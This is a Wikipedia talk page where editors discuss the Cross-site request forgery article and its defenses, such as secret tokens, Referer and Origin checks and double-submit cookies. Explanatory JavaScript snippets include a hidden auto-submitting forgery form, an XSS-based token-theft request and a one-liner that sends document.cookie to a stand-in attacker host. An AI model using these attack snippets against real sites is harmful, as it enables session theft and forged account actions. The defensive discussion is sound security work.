Talk:Cross-site request forgery


High-Impact CSRF Examples

Hey guys. In 2008 I published a technical report describing CSRF vulnerabilities in four popular sites (ING Direct, YouTube, The NYTimes and Metafilter). The ING Direct attack was particularly interesting because it allowed money to be transferred out of a bank account using a pure CSRF attack (which is the first such attack of which I'm aware). This CSRF article is strong as-is, but might be stronger if the main example (which uses a bank) were a real example and not a toy example. Regardless, I felt uncomfortable changing the text of the article to include content I've written, so I've decided to simply point to the paper and blog post here--use it as you wish.

- Bill Zeller —Preceding unsigned comment added by 24.215.164.121 (talk) 03:11, 25 May 2010 (UTC)[reply]

I agree, I'll add a reference to your publication. The eBay example is most likely not even a CSRF attack so I'll replace it with a proper one described in your publication. 81.11.234.113 (talk) 15:28, 29 May 2015 (UTC)[reply]

GET vs POST

"Also, making the server accept POST requests only instead of GET requests will make such attacks harder."

Back in the days of Mosaic and Netscape 1, yes. Since Netscape 2, no. It is trivial to call JavaScript's form.submit() on a POST form in a hidden (i)frame. Removing this enduring myth.

NeilFraser 23:27, 5 April 2006 (UTC)[reply]
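
For readers who want to see how trivial this is, here is a minimal sketch of the hidden-iframe POST trick NeilFraser describes; the target URL and field names are invented for illustration, not taken from any real site:

    // Script on a page the attacker controls: it builds a cross-site POST form,
    // points it at a hidden iframe so nothing visible happens, and submits it
    // with no user interaction.
    var frame = document.createElement('iframe');
    frame.name = 'hidden-frame';
    frame.style.display = 'none';
    document.body.appendChild(frame);

    var form = document.createElement('form');
    form.method = 'POST';
    form.action = 'https://bank.example/transfer';   // hypothetical vulnerable endpoint
    form.target = 'hidden-frame';                    // response loads invisibly
    var amount = document.createElement('input');
    amount.type = 'hidden';
    amount.name = 'amount';                          // hypothetical parameter
    amount.value = '100000';
    form.appendChild(amount);
    document.body.appendChild(form);
    form.submit();                                   // the browser attaches the victim's cookies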

POST does make it somewhat harder to exploit this. For example, you wouldn't be able to do the image trick mentioned above in the article on sites that scrub JavaScript from user input if you required POST requests. I.e., by preventing XSS and requiring POST, you will block that particular XSRF attack vector. So while I agree that POST is not the solution, it will make it less trivial to exploit XSRF issues on most sites where people contribute content.

Olekasper 08:10, 10 August 2006 (UTC)[reply]

I think this page should clarify something a little: if your site is susceptible to XSS (Cross-Site Scripting), then neither requiring POST requests nor performing transient authentication (described in the 1st paragraph) will protect you. Using JavaScript you can execute a POST request to circumvent the POST requirement. To circumvent transient authentication you can use JavaScript to download a page, look for the secret token, and then send the malicious request along with that secret token.

If you close the XSS hole on your site then either one of the above methods will close the XSRF hole.

Some more detail on why requiring POST is secure: If the user clicks a link or views an image on another site then it will issue a GET request which will be ignored. On another site JavaScript cannot be used to execute a POST request because of SOP (Same-Origin Policy). This means that if the JavaScript executed on site1.example.com then it cannot make a POST request to site2.example.com.

I'm sure that this needs to be cited in some source somewhere. Anybody know of one?

Please correct me if I'm wrong.

Sjbotha (talk) 19:10, 27 November 2007 (UTC)[reply]
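
To make the token-theft point above concrete, here is a rough JavaScript sketch; it only works if the script is already running on the victim site (i.e. via an XSS hole, otherwise the same-origin policy blocks the read), and the page URL, field name, and endpoint are invented:

    // Only meaningful when injected into the victim site itself (XSS).
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/settings', false);              // synchronous, for brevity
    xhr.send();
    // Pull the anti-CSRF token out of the returned HTML (field name is hypothetical).
    var match = xhr.responseText.match(/name="csrf_token"\s+value="([^"]+)"/);
    if (match) {
      var post = new XMLHttpRequest();
      post.open('POST', '/email/change', false);      // hypothetical state-changing action
      post.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
      post.send('csrf_token=' + encodeURIComponent(match[1]) +
                '&email=attacker%40example.com');
    }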

"On another site JavaScript cannot be used to execute a POST request because of SOP (Same-Origin Policy)." That statement is wrong. Javascript can be used to submit a form which POSTs to another site and it is trivial to do so. It can even be done without Javascript, by tricking the user into clicking on something. This is not what the same origin policy covers. See also NeilFraser's comment above. 210.84.45.67 (talk) 03:02, 15 November 2008 (UTC)[reply]

GET requests should NEVER be able to change state, according to the HTTP specification!!! See this spec. Therefore anyone following the spec will never have to make this decision. 81.11.234.113 (talk) 16:03, 29 May 2015 (UTC)[reply]

CAPTCHAs

CAPTCHAs create major usability issues and depending on the implementation, may still be vulnerable to CSRF attacks using iframes. CAPTCHAs are better at solving other problems, like bots and spam. Hidden form fields are the standard CSRF defense, and very effective assuming the browser is free of vulnerabilities and the site is free of cross-site scripting vulnerabilities. (These assumptions are reasonable because if they were not true, the attacker is unlikely to bother with CSRF as there are much easier attacks.)

Rulesdoc 20:57, 18 October 2006 (UTC)[reply]
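
For the mechanics of the hidden-form-field defense Rulesdoc mentions, here is a minimal server-side sketch in Node.js-flavoured JavaScript; the session store and helper names are assumptions for illustration, not any particular framework's API:

    const crypto = require('crypto');

    // When rendering the form: mint a random token, remember it server-side,
    // and embed the same value as a hidden field in the page.
    function renderTransferForm(session) {
      session.csrfToken = crypto.randomBytes(32).toString('hex');
      return '<form method="POST" action="/transfer">\n' +
             '  <input type="hidden" name="csrf_token" value="' + session.csrfToken + '">\n' +
             '  ...\n</form>';
    }

    // When handling the POST: reject unless the echoed token matches the stored one.
    function csrfTokenValid(session, body) {
      return typeof body.csrf_token === 'string' &&
             body.csrf_token === session.csrfToken;
    }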

"A common approach is to include a secret, user-specific token in forms that is verified in addition to the cookie. This approach doesn't save you against the most malicious of attackers, as the attacker can use XMLHttpRequest to grab the one-time token in the background and then stuff it into the POST."

As written, this is misleading. XHR is subject to the same-domain security model, therefore this particular scenario is only possible in combination with XSS.
Naturally any XSS attack can work around CSRF protection. I'm reverting the above change away. --NikolasCo 22:26, 22 October 2006 (UTC)[reply]
Thank you. Rulesdoc 03:44, 24 October 2006 (UTC)[reply]

Gmail exploit

Is the Gmail exploit from 1 January 2007 an accurate example of a cross-site request forgery? It doesn't match the description of CSRF from this article (there are no side effects of showing contacts list, the user is not authorizing an action). It doesn't fit neatly into the XSS category either. I'm removing the reference for now but please add it back if I'm mistaken. Rulesdoc 07:14, 2 January 2007 (UTC)[reply]

I think it is CSRF, because it's clearly not XSS, and surely theft of a contact list is a side effect. You are right that it doesn't change server state, but I think that, like XSS, CSRF has a number of different twists and turns. I've added back in the later paragraphs, which had nothing to do with GMail and were about an alternate protection method (double-submit cookies). Should I add the GMail stuff back in again? JoeWalker 22:48, 2 January 2007 (UTC)[reply]

Sorry about reverting away your other edits. I'd like to get some more opinions on the name for the Gmail exploit. It seems like this is an example of exploiting an inadequate JSON authentication scheme, neither CSRF or XSS. Normally in CSRF, you don't have access to the response (and don't need access to it), it's the request that matters -- but for the Gmail exploit, the response is really important. If the contacts list data were in XML instead of JSON, there would be no attack. Rulesdoc 08:19, 5 January 2007 (UTC)[reply]

HTTPS

66.8.130.129, while it's true that HTTPS is a useful tool for web applications, the problems that it solves are orthogonal to CSRF attacks. HTTPS is unnecessary or impossible for many applications (e.g. router web administration tools), yet these are often the apps most vulnerable to CSRF and easily protected by the techniques described in this article. Discussion of HTTPS would be better suited for an article on general best practices for web security. Rulesdoc 21:44, 5 January 2007 (UTC)[reply]

Name Fragmentation / Dilution

I would like to remove the reference to reverse cross-site request, because it's yet another attempt to rename CSRF, and it's based on a fundamental misunderstanding of what CSRF is. If you read the description, the name RCSR is being used to describe the use of a XSS vulnerability to launch a standard CSRF attack. This exact technique has been used for years to exploit XSS vulnerabilities in order to silently steal cookies. (With JavaScript, create an image with a source URL that includes document.cookie in the query string.) It would be nice to remove all alternative names (XSRF, session riding, etc.), because the redirect pages are bad enough (http://simonwillison.net/2005/Jun/6/wikipedia/).

(Update: This change has been made.)
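
The parenthetical cookie-theft trick, spelled out as a one-liner (the collecting URL is of course made up):

    // Injected via an XSS hole: the browser "loads an image" whose URL carries
    // the victim's cookies to a server the attacker controls.
    new Image().src = 'https://attacker.example/steal?c=' +
                      encodeURIComponent(document.cookie);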

Prevention by validating referrers?

Couldn't this issue be prevented by validating that the referrer is from the same site? (I know the referrer can be faked, but you would have to get your victim to do this...)

Or what have I misunderstood? —The preceding unsigned comment was added by 217.227.34.233 (talk) 18:57, 23 March 2007 (UTC).[reply]

Forging a victim's headers is possible with Flash: http://webappsec.org/lists/websecurity/archive/2006-07/msg00069.html —The preceding unsigned comment was added by Shiflett (talkcontribs) 13:09, 17 April 2007 (UTC).[reply]

In response to the above comment by 217.227.34.233: HTTP_REFERER is a purely optional header, so requiring it to be present by a web application is going to result in false positives for some legitimate users. For example it is sometimes blocked by firewalls as part of a privacy protection policy. --Andrew.urquhart 19:00, 28 June 2007 (UTC)[reply]

Referrers get suppressed for all sorts of legitimate reasons (e.g. connections over HTTPS). Why use referrers when hidden fields are known to work reliably? Rulesdoc 00:21, 30 July 2007 (UTC)[reply]

Another approach is using HTTP_USER_AGENT, as described on phpsec.org —Preceding unsigned comment added by 80.31.227.143 (talk) 17:16, 25 February 2009 (UTC)[reply]

I'd like to question whether the statement "The attacker must target either a site that doesn't check the “Referer” header (which is common) or a victim with a browser or plugin bug that allows referrer spoofing (which is rare)." should be there at all. It is totally irrelevant, because referrer-header checking is flawed for the reasons above; in particular, the referrer header is never submitted with HTTPS requests, so any site secure enough to support HTTPS would, if it checked the referrer, block all requests. —Preceding unsigned comment added by 115.70.140.214 (talk) 11:33, 17 June 2010 (UTC)[reply]

I'd like to question this statement as well. Referer checking is a terrible defense at best, unless you're also going to block requests with no referer, which would break a very significant number of legitimate clients. The only practical and meaningful answer is to actually fix it on your side with a secret token, or to re-prompt for credentials for every meaningful action. Anyone object to removing this limitation line? — Preceding unsigned comment added by 199.106.103.249 (talk) 23:00, 1 July 2011 (UTC)[reply]
If this statement is kept, it should be modified to clarify whether it's common for the attacker to target a site or for a site to not check the "Referrer" header. Same goes for clarifying what is rare in the second part of the sentence. Rdfiasco (talk) 20:06, 22 May 2013 (UTC)[reply]
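
For concreteness, the Referer check being debated in this thread looks roughly like this on the server (Node.js-style JavaScript; the site name is an assumption). As the comments above note, many legitimate requests arrive with no Referer at all, so both the strict and the lenient policy have real costs:

    function refererLooksLocal(req) {
      const referer = req.headers['referer'];      // may be missing entirely
      if (!referer) return false;                  // strict: breaks privacy proxies, some firewalls
      try {
        return new URL(referer).hostname === 'www.example.com';  // assumed site name
      } catch (e) {
        return false;                              // malformed header
      }
    }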

Alice vs. Eve

Isn't the name of the attacker usually Eve and not Alice, like it appears to be in the first couple of paragraphs? Wppds 16:29, 3 April 2007 (UTC)[reply]

See Alice and Bob for standard security archetypes. You are right in that Alice is usually the victim, not attacker. However Eve is typically a passive attacker (observing only). So in this case a different player such as Mallory or Dave may be more appropriate. - Dmeranda 18:43, 3 April 2007 (UTC)[reply]

Browsers restricting content to same IP/Domain

From the article:

It is also suggested that browsers should isolate content on a page to other content from the same IP, or at least the same domain, by default. This would break very little of the web and solve the problem.

I take this comment to task, specifically the "break very little of the web" part: many sites use advertisements served from other IPs and domains. If browsers disabled this, these sites would have to go back to using frames to include ads from an ad server.

I am not saying whether advertisements are good or bad, just that many sites use them and browsers that "isolate content on a page to other content from the same IP or...the same domain" would break more than "very little of the web".

Also, many sites such as blogs don't host blogger-provided images...they force the users to use image hosting sites such as Photobucket and include an img tag pointing to the outside site.

A better solution (than blocking content from outside sites) would be for the browser to not include cookies on requests to other domains (or IP addresses) while collecting content to display on this page. This stops the sending of the user's identity/authentication to the outside site, without stopping the site the user is visiting from including content from an outside site. Sorry, I don't have a Wikipedia account - Corey 01:14, 3 July 2007 (UTC)
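
Corey's idea is close to what browsers later standardised as the SameSite cookie attribute; a hedged Node.js sketch of a server opting in (cookie name and value are placeholders):

    const http = require('http');

    http.createServer((req, res) => {
      // A cookie marked SameSite=Strict is omitted by the browser from requests
      // initiated by other sites, which is essentially the behaviour proposed above.
      res.setHeader('Set-Cookie',
        'session=abc123; Path=/; Secure; HttpOnly; SameSite=Strict');
      res.end('ok');
    }).listen(8080);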

This is starting to sound like original research (see WP:NOR). Wikipedia is not the right place for new ideas about browser redesign to make their initial debut. I've taken the discussion of browser changes out of the main article until there is a citable source for this proposal. Rulesdoc 03:21, 30 July 2007 (UTC)[reply]

Semiprotection

See [1]:

We don't need to use TOR we use the IP address of each and every surfer that visit our testpage. You know stumbleupon? good, they just sent me 100K. All I need to do is redirect those stumblers to an iframe embedded form and Wikipedia will be littered with fake edits...

<eleland/talkedits> 18:12, 12 February 2008 (UTC)[reply]

Ajax only?

Article: "An alternate method is to "double submit" cookies. This method only works with Ajax based requests"

Why should that be an Ajax-only feature? The method seems pretty universal. EBusiness (talk) 20:14, 26 May 2008 (UTC)[reply]

It's not Ajax-only; there are other ways to implement it. It's just most often used for Ajax, since the synchronizer token pattern doesn't really work for Ajax requests. I've set up a server-side filter before that would generate a token, setting it in a response cookie and inserting it into the page HTML. Carl.antuar (talk) 02:01, 3 March 2016 (UTC)[reply]
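
A rough sketch of the double-submit pattern Carl.antuar describes (Node.js-flavoured; the X-CSRF-Token header and helper names are common conventions, not a specific library's API):

    const crypto = require('crypto');

    // On a page-rendering GET: issue the token twice, once as a cookie and once
    // in the page so a script (or hidden field) can echo it back later.
    function issueCsrfToken(res) {
      const token = crypto.randomBytes(32).toString('hex');
      res.setHeader('Set-Cookie', 'csrf=' + token + '; Path=/; Secure');
      return token;                                  // caller embeds this in the HTML
    }

    // On a state-changing request: the cookie and the echoed copy must match.
    // Another origin can make the browser send the cookie but cannot read it,
    // so it cannot supply a matching copy in the header or body.
    function csrfTokenMatches(req) {
      const fromCookie = (req.headers.cookie || '').match(/(?:^|;\s*)csrf=([^;]+)/);
      const echoed = req.headers['x-csrf-token'];    // e.g. set by the Ajax caller
      return Boolean(fromCookie && echoed && fromCookie[1] === echoed);
    }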

Help citing

Hi. Cross-site scripting was tagged "refimprove" in February and recently cited top to bottom and needs only a couple more refs. This article looks easier to do if only because it is shorter. I am not an expert on the topic but unless there are objections am going to try, and if anyone would like to help the more the merrier. I think it is worthwhile and both articles are sources for a W3C Working Group Note which in turn is a reference for this note and work in progress. Apologies in advance if this one also turns into a long series of tiny edits by the way (XSS took about two weeks, twice what I estimated). —SusanLesch (talk) 07:45, 11 June 2008 (UTC)[reply]

External links

Hi. In case anyone needs them here's the list of external links. OK from my point of view to restore them. —SusanLesch (talk) 19:26, 3 July 2008 (UTC)[reply]

Today on Slashdot

http://rss.slashdot.org/~r/Slashdot/slashdot/~3/X1GdZ11zk78/article.pl

Might be worth a read. Shinobu (talk) 12:12, 30 September 2008 (UTC)[reply]

"known ... since the 1990s"?

The footnote for the phrase "known and in some cases exploited since the 1990s" mentions no attacks prior to 2005. The phrase was coined in 2001 (http://www.tux.org/~peterw/csrf.txt, http://seclists.org/bugtraq/2001/Jun/0217.html, etc.), so I don't see how that footnote supports the contention that CSRF was known and exploited since the 1990s. Sure, the problem has been around since the 1990s, but I'm not aware of anyone recognizing it before 2001. —Preceding unsigned comment added by 206.112.178.116 (talk) 13:45, 30 September 2008 (UTC)[reply]

What about this?

It is said that including a secret in every form is a method that PREVENTS the attack. I'm not sure about that. The method is perfectly clear to me: foreign pages generate the malicious request, which sends the cookie in the request header, but they don't have access to the secret. The secret-string method relies on the assumption that only the original pages generated by the server have access to the secret. BUT it is enough for the security to be breached that a single page leading to the protected action is accessible without a secret. Provided JavaScript is enabled, an attacker can load that page into an iframe and then submit the subsequent forms, all of which carry the secret, which would lead the attacker to the protected action.

Example:

1. Attacker loads www.server.com/page1.php into a hidden iframe [with the GET method].
2. The page contains a form WITH THE SECRET that can be submitted to the server.

Step 2 can be reiterated to go through all the secret-protected forms.

I'd appreciate a correction if I am mistaken. If I'm not, however, it might be a good idea to indicate this behavior on the page.

Wadim.grasza (talk) 17:45, 21 October 2008 (UTC)[reply]

I think the attacker can load the form into a hidden iframe, but cannot do anything to submit the form. Javascript on the attacker's page can't access any content inside the iframe because it was sourced from a different domain, so it can't read anything in that iframe, or take any action on form controls in that iframe, due to same origin policy. The attacker would be limited to loading it in an iframe and hoping that the victim accidentally clicks in the iframe himself. 210.84.45.67 (talk) 03:14, 15 November 2008 (UTC)[reply]
As I understand it, the attacker would be able to submit the form in the IFRAME, but would not be able to populate it first; it would be blank. So if there is proper form validation, then there shouldn't be any issue. Carl.antuar (talk) 02:38, 27 July 2015 (UTC)[reply]

Example and Prevention merit elaboration

I have been trying to grok CSRF for a while now; the first time I tried to learn it from this page, I failed. Somebody just explained it to me, so I went back to check whether his explanation agrees with this article. It does, but the article is too brief. It suffers from the "we omit the subscript when it's clear" problem, for me. I hope to elaborate the Example and Prevention sections to be clear about which parties with which motivations take which actions. See also How to evaluate Web Applications security designs? written in preparation for a meeting next week. DanConnolly (talk) 16:36, 5 December 2008 (UTC)[reply]

Use different browsers

I use Firefox bundled with NoScript and CookieSafe to do general browsing and Galeon to do my banking - note that Galeon is configured to go through a proxy (Squid) that allows only a limited number of trusted sites to be accessed (allow list) - when I'm done banking I close the browser. Since CSRF risk is high and there is little we can do right now, I prefer this approach just to be on the safe side. —Preceding unsigned comment added by 154.5.47.33 (talk) 16:18, 30 June 2009 (UTC)[reply]

Intra-site request forgery

For platform websites that allow user-submitted content (including JavaScript) to be embedded on the page (such as user-submitted comments), a request forgery may be intra-site. Many of the techniques discussed under "Prevention" rely on cross-domain browser security, so those prevention techniques aren't sufficient for platform sites.

For platform sites, the "secret user-specific token" has to stay secret from the browser. So the value that is sent to the browser needs to be hashed with a value unique to the form (for instance, the target URL of the form). Allowing user-submitted JavaScript on the same page as a sensitive form will potentially expose that form to attack... but using this technique vastly limits the platform's exposure. —Preceding unsigned comment added by 216.16.251.150 (talk) 17:44, 23 April 2010 (UTC)[reply]
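
A sketch of the per-form token described above, using an HMAC so the secret itself never reaches the browser (Node.js-style; key handling and names are purely illustrative):

    const crypto = require('crypto');
    const SERVER_SECRET = process.env.CSRF_KEY || 'change-me';   // never sent to the client

    // The token is bound to both the user's session and the specific form action,
    // so a token exposed on one page cannot be replayed against a different form.
    function formToken(sessionId, formAction) {
      return crypto.createHmac('sha256', SERVER_SECRET)
                   .update(sessionId + '|' + formAction)
                   .digest('hex');
    }

    // Verification recomputes the HMAC for the form actually being submitted.
    function formTokenValid(sessionId, formAction, submitted) {
      return submitted === formToken(sessionId, formAction);
    }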

Django?

The article says:

Verifying that the request's header contains a X-Requested-With. This protection used by Ruby on Rails and Django (Web framework) has been proven unsecure under a combination of browser plugins and redirects which can allow an attacker to provide custom HTTP headers on a request to any website, hence allow a forged requests

Somebody who understands this stuff better than I do should check me on this, but I think it's correct to say:

...This protection used by Ruby on Rails and Django (Web framework) prior to version 1.2.5, has been proven unsecure ...
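
For reference, the X-Requested-With check under discussion amounts to something like this (Node.js style); the thread's point is that plugin and redirect tricks used to let attackers forge such headers, which is why relying on it alone proved insufficient:

    // Most Ajax libraries add this header; a plain cross-site form post cannot
    // (absent the plugin/redirect tricks cited above).
    function looksLikeAjax(req) {
      return req.headers['x-requested-with'] === 'XMLHttpRequest';
    }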

"Javascript hijacking"

This is now called XSSI. See Talk:JavaScript#.22Javascript_hijacking.22 — Preceding unsigned comment added by Tychay (talkcontribs) 21:56, 16 May 2012 (UTC)[reply]

Incorrect Example

In the "Background" section, the following is used as an example of a CSRF:

"Customers of a bank in Mexico were attacked in early 2008 with an image tag in email. The link in the image tag changed the DNS entry for the bank in their ADSL router to point to a malicious website impersonating the bank."

This is in fact not a CSRF attack, but a DNS cache poisoning attack. I didn't want to outright delete a cited "example," but this should probably be taken out and replaced with a correct and more detailed example.

Alternatively, it's possible that the malicious website which was injected into the DNS cache may have used a CSRF attack by forwarding users' credentials to the real site when they "log in" on the fake one, then submitting a malicious request once users were known to be logged in for real. If this is the case, this aspect of the attack should be made more clear. Right now the entry is confusing and unrelated to the topic. — Preceding unsigned comment added by 184.74.161.61 (talk) 14:43, 21 June 2012 (UTC)[reply]

Origin header safety

On 11 September 2012, Hydrox changed

"Verifying that the request's header contains a X-Requested-With […] has been proven unsecure"

to

"Verifying that the request's header contains a X-Requested-With or checking the HTTP Referer header and/or HTTP Origin […] has been proven unsecure"

But I don't see where the Origin header is mentioned in the two links provided. And other good sites on security, like https://code.google.com/p/browsersec/wiki/Part3#Origin_headers and https://code.google.com/p/html5security/wiki/CrossOriginRequestSecurity, don't say anything about Origin header spoofing.

Is there a real source to substantiate this claim? Or is it inferred from the sentence in the Django blog post, "can allow an attacker to provide custom HTTP headers on a request to any website"? In this case, it depends how you define "custom": is it "you can customize all HTTP headers" or "you can add a custom HTTP header", meaning headers not handled by the browsers, like all the X-... (X-Requested-With)?

Both interpretations make sense to me. — Preceding unsigned comment added by Acoudeyras (talkcontribs) 15:42, 2 October 2013 (UTC)[reply]
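
For readers following this thread, the Origin check itself is simple (Node.js-style sketch; the allowed origin is invented). The open question above is only whether the header could be forged via plugins:

    // Browsers normally attach an Origin header to cross-site POSTs;
    // absent or mismatched values would be rejected by the server.
    function originAllowed(req) {
      return req.headers['origin'] === 'https://www.example.com';
    }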

External links modified

Hello fellow Wikipedians,

I have just modified 2 external links on Cross-site request forgery. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes:

When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs.

This message was posted before February 2018. After February 2018, "External links modified" talk page sections are no longer generated or monitored by InternetArchiveBot. No special action is required regarding these talk page notices, other than regular verification using the archive tool instructions below. Editors have permission to delete these "External links modified" talk page sections if they want to de-clutter talk pages, but see the RfC before doing mass systematic removals. This message is updated dynamically through the template {{source check}} (last update: 5 June 2024).

  • If you have discovered URLs which were erroneously considered dead by the bot, you can report them with this tool.
  • If you found an error with any archives or the URLs themselves, you can fix them with this tool.

Cheers.—InternetArchiveBot (Report bug) 20:44, 14 August 2017 (UTC)[reply]

CSRF and REST without a browser

I'm not clear, from reading this article, if CSRF is an issue with a non-browser based RESTful service. With a browser, a _csrf token can be submitted in a web form, but with a RESTful service, there's no browser. It's not clear if this means a _csrf token won't help, or if it won't be necessary. Is CSRF still a problem with a non-browser based service? The article should address this issue. —MiguelMunoz (talk) 17:28, 7 January 2021 (UTC)[reply]

ស្តេច សេដ

SOK NA SAD 36.37.142.102 (talk) 20:44, 22 January 2024 (UTC)[reply]